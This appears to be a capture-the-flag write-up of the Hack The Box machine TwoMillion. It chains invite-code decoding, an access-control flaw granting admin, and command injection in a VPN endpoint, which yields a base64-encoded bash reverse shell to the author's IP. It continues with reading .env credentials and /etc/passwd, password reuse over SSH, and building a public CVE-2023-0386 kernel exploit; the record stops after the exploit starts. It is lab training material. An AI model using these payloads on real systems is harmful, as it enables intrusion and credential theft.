TwoMillion

#easy #linux #commandinjection

TwoMillion
TwoMillion

https://app.hackthebox.com/machines/TwoMillion

Enumeration

sudo nmap -p- -sS --open --min-rate 5000 -Pn -n -vv 10.10.11.221 -oA openPorts
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63
cat openPorts.nmap | grep -oP '^[0-9]{1,5}' | tr '\n' ',' | sed 's/,$//'
nmap -p 22,80 -n -Pn -sCV 10.10.11.221 -oA targeted
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open  http    nginx
|_http-title: Did not follow redirect to http://2million.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
echo '10.10.11.221 2million.htb' | sudo tee -a /etc/hosts

http://2million.htb/

Running the invite-page JavaScript through de4js (https://lelinhtinh.github.io/de4js/) recovers two readable helpers; the second one names an undocumented endpoint whose answer is only ever written to the browser console, which is why it is found by reading the script rather than by using the page:

// Sends the user-supplied invite code to the API for validation.
// Whatever comes back — success or error — is only logged to the console,
// so nothing about the result is shown to the user.
function verifyInviteCode(code) {
    var payload = { "code": code };
    var logResponse = function (response) {
        console.log(response);
    };
    $.ajax({
        url: '/api/v1/invite/verify',
        type: "POST",
        dataType: "json",
        data: payload,
        success: logResponse,
        error: logResponse
    });
}

// Asks the API how invite codes are generated. No body is sent; the reply
// (ROT13-encoded instructions, as seen below) is only logged to the console,
// so this endpoint is never surfaced in the UI — only in the script.
function makeInviteCode() {
    var logResponse = function (response) {
        console.log(response);
    };
    $.ajax({
        url: '/api/v1/invite/how/to/generate',
        type: "POST",
        dataType: "json",
        success: logResponse,
        error: logResponse
    });
}
curl -s -X POST http://2million.htb/api/v1/invite/how/to/generate | jq
{
  "0": 200,
  "success": 1,
  "data": {
    "data": "Va beqre gb trarengr gur vaivgr pbqr, znxr n CBFG erdhrfg gb /ncv/i1/vaivgr/trarengr",
    "enctype": "ROT13"
  },
  "hint": "Data is encrypted ... We should probbably check the encryption type in order to decrypt it..."
}
echo 'Va beqre gb trarengr gur vaivgr pbqr, znxr n CBFG erdhrfg gb /ncv/i1/vaivgr/trarengr' | tr 'A-Za-z' 'N-ZA-Mn-za-m'
In order to generate the invite code, make a POST request to /api/v1/invite/generate
curl -s -X POST http://2million.htb/api/v1/invite/generate | jq
{
  "0": 200,
  "success": 1,
  "data": {
    "code": "MkxP************************TTA=",
    "format": "encoded"
  }
}
echo 'MkxP************************TTA=' | base64 -d
2LO*****************XM0

http://2million.htb/home/access

Register an account with the decoded invite code and log in; the PHPSESSID cookie of that authenticated session is what every API call below presents (the first curl, sent without it, is answered with 401). On /home/access, click "Connection Pack" and intercept the request in Burp Suite — it lands on one of the /api/v1/user/vpn/ routes, which is what motivates enumerating /api directly.

curl -v 2million.htb/api
* Host 2million.htb:80 was resolved.
* IPv6: (none)
* IPv4: 10.10.11.221
*   Trying 10.10.11.221:80...
* Connected to 2million.htb (10.10.11.221) port 80
* using HTTP/1.x
> GET /api HTTP/1.1
> Host: 2million.htb
> User-Agent: curl/8.14.1
> Accept: */*
> 
* Request completely sent off
< HTTP/1.1 401 Unauthorized
< Server: nginx
< Date: Tue, 24 Jun 2025 03:19:12 GMT
< Content-Type: text/html; charset=UTF-8
< Transfer-Encoding: chunked
< Connection: keep-alive
< Set-Cookie: PHPSESSID=s624h3a4mgdn46acip7eporm9f; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< 
* Connection #0 to host 2million.htb left intact
curl -sv 2million.htb/api --cookie 'PHPSESSID=vmqmtudsnrgq93tjv1cfbnkf9s' | jq
{
  "/api/v1": "Version 1 of the API"
}
curl -s 2million.htb/api/v1 --cookie 'PHPSESSID=vmqmtudsnrgq93tjv1cfbnkf9s' | jq
{
  "v1": {
    "user": {
      "GET": {
        "/api/v1": "Route List",
        "/api/v1/invite/how/to/generate": "Instructions on invite code generation",
        "/api/v1/invite/generate": "Generate invite code",
        "/api/v1/invite/verify": "Verify invite code",
        "/api/v1/user/auth": "Check if user is authenticated",
        "/api/v1/user/vpn/generate": "Generate a new VPN configuration",
        "/api/v1/user/vpn/regenerate": "Regenerate VPN configuration",
        "/api/v1/user/vpn/download": "Download OVPN file"
      },
      "POST": {
        "/api/v1/user/register": "Register a new user",
        "/api/v1/user/login": "Login with existing user"
      }
    },
    "admin": {
      "GET": {
        "/api/v1/admin/auth": "Check if user is admin"
      },
      "POST": {
        "/api/v1/admin/vpn/generate": "Generate VPN for specific user"
      },
      "PUT": {
        "/api/v1/admin/settings/update": "Update user settings"
      }
    }
  }
}
curl -s -X PUT 2million.htb/api/v1/admin/settings/update --cookie 'PHPSESSID=vmqmtudsnrgq93tjv1cfbnkf9s' | jq
{
  "status": "danger",
  "message": "Invalid content type."
}
curl -s -X PUT 2million.htb/api/v1/admin/settings/update --cookie 'PHPSESSID=vmqmtudsnrgq93tjv1cfbnkf9s' -H 'Content-Type: application/json' | jq
{
  "status": "danger",
  "message": "Missing parameter: email"
}
curl -s -X PUT 2million.htb/api/v1/admin/settings/update --cookie 'PHPSESSID=vmqmtudsnrgq93tjv1cfbnkf9s' -H 'Content-Type: application/json' --data '{"email": "sandia@sandia.com"}' | jq
{
  "status": "danger",
  "message": "Missing parameter: is_admin"
}
curl -s -X PUT 2million.htb/api/v1/admin/settings/update --cookie 'PHPSESSID=vmqmtudsnrgq93tjv1cfbnkf9s' -H 'Content-Type: application/json' --data '{"email": "sandia@sandia.com", "is_admin": true}' | jq
{
  "status": "danger",
  "message": "Variable is_admin needs to be either 0 or 1."
}
curl -s -X PUT 2million.htb/api/v1/admin/settings/update --cookie 'PHPSESSID=vmqmtudsnrgq93tjv1cfbnkf9s' -H 'Content-Type: application/json' --data '{"email": "sandia@sandia.com", "is_admin": 1}' | jq
{
  "id": 16,
  "username": "sandia",
  "is_admin": 1
}
curl -s 2million.htb/api/v1/admin/auth --cookie 'PHPSESSID=vmqmtudsnrgq93tjv1cfbnkf9s' | jq
{
  "message": true
}
curl -sX POST http://2million.htb/api/v1/admin/vpn/generate --cookie "PHPSESSID=vmqmtudsnrgq93tjv1cfbnkf9s" --header "Content-Type: application/json" | jq
{
  "status": "danger",
  "message": "Missing parameter: username"
}
curl -X POST http://2million.htb/api/v1/admin/vpn/generate --cookie "PHPSESSID=vmqmtudsnrgq93tjv1cfbnkf9s" --header "Content-Type: application/json" --data '{"username": "sandia"}'
client
dev tun
proto udp
remote edge-eu-free-1.2million.htb 1337
resolv-retry infinite
nobind
persist-key
persist-tun
remote-cert-tls server
comp-lzo
verb 3
data-ciphers-fallback AES-128-CBC
data-ciphers AES-256-CBC:AES-256-CFB:AES-256-CFB1:AES-256-CFB8:AES-256-OFB:AES-256-GCM
tls-cipher "DEFAULT:@SECLEVEL=0"
auth SHA256
key-direction 1
<ca>
-----BEGIN CERTIFICATE-----
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
2iX/ag==
-----END CERTIFICATE-----
</ca>
<cert>
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 1 (0x1)
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=UK, ST=London, L=London, O=HackTheBox, OU=VPN, CN=2million/emailAddress=info@hackthebox.eu
        Validity
            Not Before: Jun 26 23:29:13 2025 GMT
            Not After : Jun 26 23:29:13 2026 GMT
        Subject: C=GB, ST=London, L=London, O=sandia, CN=sandia
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (2048 bit)
                Modulus:
                    00:b3:36:70:80:ac:61:59:c2:ff:93:f2:ad:39:9a:
                    04:b7:8e:54:9e:45:ef:c4:86:f2:99:87:a4:65:2d:
                    56:32:4f:06:e8:7e:2c:6c:e0:67:eb:9e:da:ed:c8:
                    0c:33:bf:aa:e9:eb:cc:8f:3a:36:9e:e3:77:82:ba:
                    9a:23:c0:18:41:4b:a2:92:1d:5b:fe:69:8e:b1:59:
                    6c:62:1d:33:cb:7d:f8:09:f3:a3:93:8e:ba:d2:e0:
                    25:59:e0:56:66:ef:a7:21:85:df:ea:89:4c:3b:32:
                    eb:54:21:a9:92:1a:9d:23:bb:e1:07:e5:0a:57:6c:
                    46:30:18:54:6b:ab:1a:75:86:aa:c1:70:40:61:d8:
                    b5:89:db:66:d5:65:f6:b1:b6:0d:1c:16:42:24:41:
                    3c:aa:e4:ed:aa:ff:15:ea:f9:42:81:a3:79:20:6d:
                    45:21:4d:38:d4:5b:7e:d9:55:54:fa:09:9d:5c:0f:
                    e4:84:b3:62:62:87:c0:6a:41:1d:f2:b3:14:ab:c1:
                    48:32:14:64:ab:0f:da:c1:ea:21:ca:cf:61:7f:fd:
                    53:71:31:f8:25:0e:76:ff:04:0b:56:e5:64:95:d1:
                    54:2a:a4:3d:67:78:bd:e7:a5:6c:0a:4b:71:55:e7:
                    2e:60:a7:b3:92:53:bb:03:eb:59:93:80:6e:1c:78:
                    6f:b1
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Subject Key Identifier: 
                7E:E2:EE:57:C4:3A:32:0F:F5:E0:90:5E:AA:62:B1:48:AB:DE:F6:9D
            X509v3 Authority Key Identifier: 
                7A:62:DD:1D:B6:FE:4A:C8:E3:F8:9F:FA:AC:F4:15:0C:96:BA:2E:91
            X509v3 Basic Constraints: 
                CA:FALSE
            X509v3 Key Usage: 
                Digital Signature, Non Repudiation, Key Encipherment, Data Encipherment, Key Agreement, Certificate Sign, CRL Sign
            Netscape Comment: 
                OpenSSL Generated Certificate
    Signature Algorithm: sha256WithRSAEncryption
    Signature Value:
        9f:d5:b2:28:ec:b0:18:af:15:c5:cf:26:96:68:2d:8c:a4:96:
        fe:18:31:53:71:19:c6:c7:69:01:8d:11:b5:33:e4:1c:bc:e3:
        4a:39:90:6e:43:b4:7a:da:c6:aa:7e:33:b5:9b:f5:0e:92:b7:
        d7:83:27:e2:eb:cb:9c:81:24:a0:81:72:4e:27:a9:47:9a:cc:
        f7:b8:47:de:83:2e:b0:df:b8:a7:f4:cd:90:3a:ba:d8:a7:25:
        4d:fe:7b:0d:08:96:18:ba:48:1c:2c:d0:ba:18:af:8f:34:ee:
        93:8a:a3:c3:a3:8e:f0:66:60:46:56:a6:6e:a9:ec:da:4a:4c:
        58:c2:2e:26:ff:17:33:e1:2d:6f:09:04:d7:2f:92:7e:7b:66:
        be:ab:f9:32:21:a3:55:56:42:4c:7d:11:63:89:e7:3f:ec:2a:
        ff:95:60:c0:e8:9b:59:2e:7f:6b:f9:4a:ee:2a:8d:77:80:e0:
        bc:13:7a:04:40:44:48:3e:29:bb:82:fa:0d:f4:88:c8:f0:8a:
        e6:ca:cd:91:ea:5d:58:64:ee:8b:93:fe:27:cd:b0:0b:2d:e4:
        d5:d2:56:7b:6d:60:a2:6b:ca:80:47:6b:27:d9:c0:e1:5f:60:
        de:2a:fa:ae:d9:73:e4:11:26:5a:3a:9a:8d:7c:28:1c:79:d9:
        0a:4e:74:2b:59:cd:a7:78:b0:b6:40:33:b8:65:4c:86:09:2a:
        66:23:e7:d5:78:2f:dc:bf:dd:3f:51:df:4a:8b:dd:59:2b:ab:
        a4:7a:ac:d4:44:82:0e:61:58:a7:15:88:cb:74:aa:d5:19:ae:
        87:45:70:09:27:be:6c:05:d4:2b:ae:dc:7a:f5:5d:6b:82:f6:
        4a:fd:fb:b1:3b:f9:cc:f5:0c:1d:ce:d2:6f:c5:ba:b0:4f:66:
        c8:82:49:c3:99:ba:ac:b9:85:5c:4d:37:7f:41:a3:8a:60:01:
        12:4f:3a:95:9c:a6:0b:67:be:a9:0b:f1:a8:b2:b7:8f:e1:82:
        b3:08:f2:8c:fe:cb:fe:b0:47:3a:49:db:40:a8:50:bc:b4:33:
        ed:90:47:7d:fb:e9:d0:cf:4d:3f:ed:70:b6:14:8d:58:57:ac:
        32:28:0b:e7:72:01:01:c7:14:6c:aa:ad:c4:8a:dd:6d:66:fc:
        d8:04:db:b7:4a:4b:66:4a:21:12:7a:be:0e:26:3b:cb:e0:0f:
        97:c5:e4:ae:9d:59:9e:b9:7c:e4:fa:86:7d:e1:71:66:51:73:
        bc:ad:38:a4:67:e7:14:4e:b4:e6:3a:3c:fe:f0:35:48:6e:ed:
        12:49:67:f9:13:49:5f:dd:89:27:ac:25:49:b1:27:33:e0:67:
        f8:3b:c9:40:72:9e:e7:8f
-----BEGIN CERTIFICATE-----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-----END CERTIFICATE-----
</cert>
<key>
-----BEGIN PRIVATE KEY-----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-----END PRIVATE KEY-----
</key>
<tls-auth>
#
# 2048 bit OpenVPN static key
#
-----BEGIN OpenVPN Static key V1-----
45df64cdd950c711636abdb1f78c058c
358730b4f3bcb119b03e43c46a856444
05e96eaed55755e3eef41cd21538d041
079c0fc8312517d851195139eceb458b
f8ff28ba7d46ef9ce65f13e0e259e5e3
068a47535cd80980483a64d16b7d10ca
574bb34c7ad1490ca61d1f45e5987e26
7952930b85327879cc0333bb96999abe
2d30e4b592890149836d0f1eacd2cb8c
a67776f332ec962bc22051deb9a94a78
2b51bafe2da61c3dc68bbdd39fa35633
e511535e57174665a2495df74f186a83
479944660ba924c91dd9b00f61bc09f5
2fe7039aa114309111580bc5c910b4ac
c9efb55a3f0853e4b6244e3939972ff6
bfd36c19a809981c06a91882b6800549
-----END OpenVPN Static key V1-----
</tls-auth>

Command Injection

Command Injection

Two server-side flaws were just chained. First, broken access control: /api rejects unauthenticated requests with 401, but PUT /api/v1/admin/settings/update only checks for a valid session, not for admin rights, so an ordinary user can set is_admin=1 on their own account, after which /api/v1/admin/auth returns true. Second, the username sent to /api/v1/admin/vpn/generate appears to be interpolated unsanitised into a shell command (presumably the one that builds the .ovpn profile), so a `;` terminates that command and the remainder of the value is executed as www-data — the whoami below confirms it. The reverse-shell payload is base64-encoded so that it contains no quotes or shell metacharacters that would break the JSON body. Separately, the profile the endpoint hands out is itself weak (`tls-cipher "DEFAULT:@SECLEVEL=0"`, `comp-lzo`), which is worth noting as its own finding.

curl -X POST http://2million.htb/api/v1/admin/vpn/generate --cookie "PHPSESSID=vmqmtudsnrgq93tjv1cfbnkf9s" --header "Content-Type: application/json" --data '{"username":"sandia; whoami;"}'
www-data
echo 'bash -i >& /dev/tcp/10.10.15.113/1111 0>&1' | base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNS4xMTMvMTExMSAwPiYxCg==
nc -lnvp 1111
curl -X POST http://2million.htb/api/v1/admin/vpn/generate --cookie "PHPSESSID=vmqmtudsnrgq93tjv1cfbnkf9s" --header "Content-Type: application/json" --data '{"username":"sandia; echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNS4xMTMvMTExMSAwPiYxCg== | base64 -d | bash;"}'
listening on [any] 1111 ...
connect to [10.10.15.113] from (UNKNOWN) [10.10.11.221] 39258
bash: cannot set terminal process group (1194): Inappropriate ioctl for device
bash: no job control in this shell
www-data@2million:~/html$ ls -la
total 56
drwxr-xr-x 10 root root 4096 Jun 26 23:40 .
drwxr-xr-x  3 root root 4096 Jun  6  2023 ..
-rw-r--r--  1 root root   87 Jun  2  2023 .env
-rw-r--r--  1 root root 1237 Jun  2  2023 Database.php
-rw-r--r--  1 root root 2787 Jun  2  2023 Router.php
drwxr-xr-x  5 root root 4096 Jun 26 23:40 VPN
drwxr-xr-x  2 root root 4096 Jun  6  2023 assets
drwxr-xr-x  2 root root 4096 Jun  6  2023 controllers
drwxr-xr-x  5 root root 4096 Jun  6  2023 css
drwxr-xr-x  2 root root 4096 Jun  6  2023 fonts
drwxr-xr-x  2 root root 4096 Jun  6  2023 images
-rw-r--r--  1 root root 2692 Jun  2  2023 index.php
drwxr-xr-x  3 root root 4096 Jun  6  2023 js
drwxr-xr-x  2 root root 4096 Jun  6  2023 views
www-data@2million:~/html$ cat .env
DB_HOST=127.0.0.1
DB_DATABASE=htb_prod
DB_USERNAME=admin
DB_PASSWORD=Su***********s123
www-data@2million:~/html$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:114:120:MySQL Server,,,:/nonexistent:/bin/false
admin:x:1000:1000::/home/admin:/bin/bash
memcache:x:115:121:Memcached,,,:/nonexistent:/bin/false
_laurel:x:998:998::/var/log/laurel:/bin/false
ssh admin@10.10.11.221
The authenticity of host '10.10.11.221 (10.10.11.221)' can't be established.
ED25519 key fingerprint is SHA256:TgNhCKF6jUX7MG8TC01/MUj/+u0EBasUVsdSQMHdyfY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.221' (ED25519) to the list of known hosts.
admin@10.10.11.221's password: 
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.15.70-051570-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Jun 26 11:45:02 PM UTC 2025

  System load:           0.0
  Usage of /:            74.8% of 4.82GB
  Memory usage:          9%
  Swap usage:            0%
  Processes:             231
  Users logged in:       0
  IPv4 address for eth0: 10.10.11.221
  IPv6 address for eth0: dead:beef::250:56ff:feb0:3f25


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


You have mail.
Last login: Thu Jun 26 22:22:04 2025 from 10.10.14.204
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

admin@2million:~$ ls
user.txt
admin@2million:~$ cat user.txt
70df************************ce41

Privilege Escalation

The www-data shell exposed DB_PASSWORD in /var/www/html/.env, and /etc/passwd lists a login-capable local user named admin (the same name as DB_USERNAME). That database password was reused as admin's SSH password above — database-to-OS credential reuse — which yielded user.txt. The remaining step is going from admin to root.

admin@2million:~$ ls -la /var/mail/
total 12
drwxrwsr-x  2 root  mail  4096 Jun  2  2023 .
drwxr-xr-x 14 root  root  4096 Jun  6  2023 ..
-rw-r--r--  1 admin admin  540 Jun  2  2023 admin
admin@2million:~$ cat /var/mail/admin
From: ch4p <ch4p@2million.htb>
To: admin <admin@2million.htb>
Cc: g0blin <g0blin@2million.htb>
Subject: Urgent: Patch System OS
Date: Tue, 1 June 2023 10:45:22 -0700
Message-ID: <9876543210@2million.htb>
X-Mailer: ThunderMail Pro 5.2

Hey admin,

I'm know you're working as fast as you can to do the DB migration. While we're partially down, can you also upgrade the OS on our web host? There have been a few serious Linux kernel CVEs already this year. That one in OverlayFS / FUSE looks nasty. We can't get popped by that.

HTB Godfather

The mail points at a 2023 OverlayFS / FUSE kernel bug; searching for it leads to CVE-2023-0386 (write-up below). Roughly: when OverlayFS copied a setuid file up from a lower layer — here one served by FUSE, from inside an unprivileged user namespace — it did not validate the uid/gid mapping, so the copied file could end up root-owned with the setuid bit intact. Check the kernel before trusting the lead: the fix shipped upstream in early 2023 and was backported to the stable branches, and the -051570-generic suffix in uname below is the Ubuntu mainline-PPA build naming, i.e. a September 2022 kernel that receives none of Ubuntu's security backports.

https://securitylabs.datadoghq.com/articles/overlayfs-cve-2023-0386/

admin@2million:~$ uname -a
Linux 2million 5.15.70-051570-generic #202209231339 SMP Fri Sep 23 13:45:37 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
admin@2million:~$ lsb_release -a
No LSB modules are available.
Distributor ID:	Ubuntu
Description:	Ubuntu 22.04.2 LTS
Release:	22.04
Codename:	jammy

Searching GitHub for an OverlayFS/FUSE PoC (site:github.com) turns up the repository below. Read fuse.c, exp.c and getshell.c before compiling: a public exploit is unreviewed third-party code that will run with your privileges on the target, so confirm it does only what it claims (mounts the FUSE layer, triggers the copy-up, spawns a shell) and contains nothing destructive or that calls home. Then clone it, zip it, scp the archive to /tmp on the target, unzip it there (the unzip step is not shown in the transcript) and build with make.

https://github.com/xkaneiki/CVE-2023-0386

git clone https://github.com/xkaneiki/CVE-2023-0386.git
zip -r exploit.zip CVE-2023-0386
scp exploit.zip admin@2million.htb:/tmp
admin@2million:~$ cd /tmp
admin@2million:/tmp$ ls -la
total 524
drwxrwxrwt 15 root  root    4096 Jun 27 00:02 .
drwxr-xr-x 19 root  root    4096 Jun  6  2023 ..
-rw-rw-r--  1 admin admin 471232 Jun 27 00:02 exploit.zip
drwxrwxrwt  2 root  root    4096 Jun 26 10:01 .font-unix
drwxrwxrwt  2 root  root    4096 Jun 26 10:01 .ICE-unix
drwx------  3 root  root    4096 Jun 26 10:01 snap-private-tmp
drwx------  3 root  root    4096 Jun 26 10:01 systemd-private-c23e74febee34d52b47c9af48c95cad6-memcached.service-DaQ8TV
drwx------  3 root  root    4096 Jun 26 10:01 systemd-private-c23e74febee34d52b47c9af48c95cad6-ModemManager.service-v7mulI
drwx------  3 root  root    4096 Jun 26 10:01 systemd-private-c23e74febee34d52b47c9af48c95cad6-systemd-logind.service-9PRvZS
drwx------  3 root  root    4096 Jun 26 10:01 systemd-private-c23e74febee34d52b47c9af48c95cad6-systemd-resolved.service-9oYHqF
drwx------  3 root  root    4096 Jun 26 10:01 systemd-private-c23e74febee34d52b47c9af48c95cad6-systemd-timesyncd.service-9alo7E
drwx------  3 root  root    4096 Jun 26 20:42 systemd-private-c23e74febee34d52b47c9af48c95cad6-upower.service-IrHFVI
drwxrwxrwt  2 root  root    4096 Jun 26 10:01 .Test-unix
drwx------  2 root  root    4096 Jun 26 10:06 vmware-root_617-4022243191
drwxrwxrwt  2 root  root    4096 Jun 26 10:01 .X11-unix
drwxrwxrwt  2 root  root    4096 Jun 26 10:01 .XIM-unix
admin@2million:/tmp$ cd CVE-2023-0386/
admin@2million:/tmp/CVE-2023-0386$ make all
gcc fuse.c -o fuse -D_FILE_OFFSET_BITS=64 -static -pthread -lfuse -ldl
fuse.c: In function ‘read_buf_callback’:
fuse.c:106:21: warning: format ‘%d’ expects argument of type ‘int’, but argument 2 has type ‘off_t’ {aka ‘long int’} [-Wformat=]
  106 |     printf("offset %d\n", off);
      |                    ~^     ~~~
      |                     |     |
      |                     int   off_t {aka long int}
      |                    %ld
fuse.c:107:19: warning: format ‘%d’ expects argument of type ‘int’, but argument 2 has type ‘size_t’ {aka ‘long unsigned int’} [-Wformat=]
  107 |     printf("size %d\n", size);
      |                  ~^     ~~~~
      |                   |     |
      |                   int   size_t {aka long unsigned int}
      |                  %ld
fuse.c: In function ‘main’:
fuse.c:214:12: warning: implicit declaration of function ‘read’; did you mean ‘fread’? [-Wimplicit-function-declaration]
  214 |     while (read(fd, content + clen, 1) > 0)
      |            ^~~~
      |            fread
fuse.c:216:5: warning: implicit declaration of function ‘close’; did you mean ‘pclose’? [-Wimplicit-function-declaration]
  216 |     close(fd);
      |     ^~~~~
      |     pclose
fuse.c:221:5: warning: implicit declaration of function ‘rmdir’ [-Wimplicit-function-declaration]
  221 |     rmdir(mount_path);
      |     ^~~~~
/usr/bin/ld: /usr/lib/gcc/x86_64-linux-gnu/11/../../../x86_64-linux-gnu/libfuse.a(fuse.o): in function `fuse_new_common':
(.text+0xaf4e): warning: Using 'dlopen' in statically linked applications requires at runtime the shared libraries from the glibc version used for linking
gcc -o exp exp.c -lcap
gcc -o gc getshell.c
admin@2million:/tmp/CVE-2023-0386$ ./fuse ./ovlcap/lower ./gc &
[1] 5582
